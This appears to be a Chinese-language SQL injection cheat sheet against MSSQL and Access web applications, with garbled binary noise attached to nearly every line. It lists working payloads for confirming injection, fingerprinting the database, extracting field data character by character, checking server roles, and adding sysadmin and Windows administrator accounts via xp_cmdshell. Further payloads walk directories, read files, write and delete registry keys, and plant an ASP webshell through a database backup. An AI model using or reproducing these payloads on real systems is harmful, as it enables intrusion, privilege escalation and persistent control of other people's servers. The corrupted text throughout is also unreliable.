1.判断是否有注入;and 1=1 ;and 1=2 Q�h�c;�Z�l
2.初步判断是否是mssql ;and user>0 _Ds,91<muQ
uCuB>��x&�
3.注入参数是字符'and [查询条件] and ''=' ���M&f�aa7
�QT�%vrXzz
4.搜索时没过滤参数的'and [查询条件] and '%25'=' OA\]��|2 :
V��MJaL}J]
5.判断数据库系统 k�%O3\��q�
-�oUN�K�}>
;and (select count(*) from sysobjects)>0 mssql OUGk�am0UK
�;]�>���)6
;and (select count(*) from msysobjects)>0 access ]�W2#�8:i
z8{�-I�@+`
�VE��I�ct{
��(/��]#G8
6.猜数据库 ;and (select Count(*) from [数据库名])>0 CP%^)L�X *
4~�F�RE)8�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �$2i@@�#g8
�L'a�B/5_%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �N�R��
k�~
`]6<j<'
,
9.(1)猜字段的ascii值(access) �e`7>QS�;.
VX�8��CE�O
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 pO�:��]3qv
�C8M�x>�6�
(2)猜字段的ascii值(mssql) F?H=2mzKbz
&zE���B�fr
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =�GF=_�Ac�
h�:?qd���
10.测试权限结构(mssql) �);t+�~YPS
CqZHs
9+e&
i����+~BVb
A��b� j�7
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �tQN�r�Dp+
C3�f\E: D)
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 6�hYz^}2g�
Xa?igbgAwx
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- e�m0�Y'�J
kAPSVTH�$v
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2;:p��
H3
�m��&xVlS�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �]Z�6? �m
�S`�FIb'J�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Dr%wa�b"yy
�%�3#C0%{x
;and 1=(select IS_MEMBER('db_owner'));-- �"Z,�T%��]
Avi_�]�h�&
_<���sN54�
h�\�3-8�m
11.添加mssql和系统的帐户 s>L�.V2!$0
7t�<�MH�dw
;exec master.dbo.sp_addlogin username;-- h|� wdx(4
;exec master.dbo.sp_password null,username,password;-- ?#Z4Dg
�9|
\
y�a@9OA
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- |#Lz�0<�c;
p�?cc�Bq��
;exec master.dbo.xp_cmdshell 'net user username password �g9V�Y{[�V
MO�7R3P�P�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $m*Gu:#xm&
G��CO: !,1
;exec master.dbo.xp_cmdshell 'net user username password /add';-- `<>Q�K�pAn
�kI@�<H<��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- IHd�
W!q��
"P(ob�k���
�$r�r@3H+
m26YAcip}�
12.(1)遍历目录 ?(d1;/0v>�
N A��Y3�.e
;create table dirs(paths varchar(100), id int) u?dPC�gs;h
�U�887@-!3
;insert dirs exec master.dbo.xp_dirtree 'c:\' 'xkl|P>=],
�7f ub�^'_
;and (select top 1 paths from dirs)>0 =IQ}Y_x�r
=dKjTBR S'
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) {� ,c*O��R
kVKAG\F��
_]4�p51r0�
pl1CP�xSdO
(2)遍历目录 >J��S^�yVk
-XV�+F@`Md
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- s��r�&W+4T
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 KHHYk>F�R�
fDq�T7}L��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 x:!s+�q`
s
bl^�Ihz�a�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 .�yXq�a"�p
F/>�\��uzu
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ���g��:JSy
�L�98�T!5)
��SKnY�eT�
JRFUNy1+e1
13.mssql中的存储过程 w��s!~MSIy
+8N6tw�/�&
xp_regenumvalues 注册表根键, 子键 ���!^su=�c
=VuSi(d;e{
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 p5o��r"tK
H#;*kc
�a4
xp_regread 根键,子键,键值名 GK'p$`oJm
=tt3�nf�Z9
;exec xp_regread �%ZWt 45A
(M$>*O3SR�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 c6� m��S��
=r� �^_D�=
xp_regwrite 根键,子键, 值名, 值类型, 值 �|�R@T�`dW
o68i�0�aFW
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 T
pF��[-fO
E�C�,`t*�<
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �MU
�a[}?�
QE[<�Y�3M�
xp_regdeletevalue 根键,子键,值名 .aY�$-Y�<�
!KK��`+ 9/
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Y� 2ANt w@
I)FFh%m<}a
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /�^nIO�AeE
�Kh$�"�5dy
#�Iz�)Mu��
S�5 q�1M�n
14.mssql的backup创建webshell l�Rg?||1ik
eZT8gKbjJ)
use model �j�mr
.gW�
��.U�L�2(0
create table cmd(str image); >iOf3I-ATt
z�6E� =%-`
insert into cmd(str) values (''); A3��_p*n@�
s��~ 8��g�
backup database model to disk='c:\l.asp'; <F0��^+Pf/
EA6l11{Gk1
o$.#�A]Flb
H�"�AL�@�=
15.mssql内置函数 "�)��uKD�q
[ZS�C]��w^
;and (select @@version)>0 获得Windows的版本号 $]E+E��.P�
#'s�$6�gT=
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ~KS@U�lrox
9Tt�%~m^�
;and (select user_name())>0 爆当前系统的连接用户 p�K3A�/ry<
@��y��;VV*
;and (select db_name())>0 得到当前连接的数据库 .@OQ$��D�<
[��d[��w/@
2'S&%�Uy�P
p��PRX#3�
16.简洁的webshell +8//mrL_/
#�4�$Y��Q�
use model u�M[|>t��
tp��cB}HUv
create table cmd(str image); )x/�#s�W%)
Zc~7R`v7}
insert into cmd(str) values (''); 8�~C}0�H��
}�bS1M����
backup database model to disk='g:\wwwtest\l.asp';
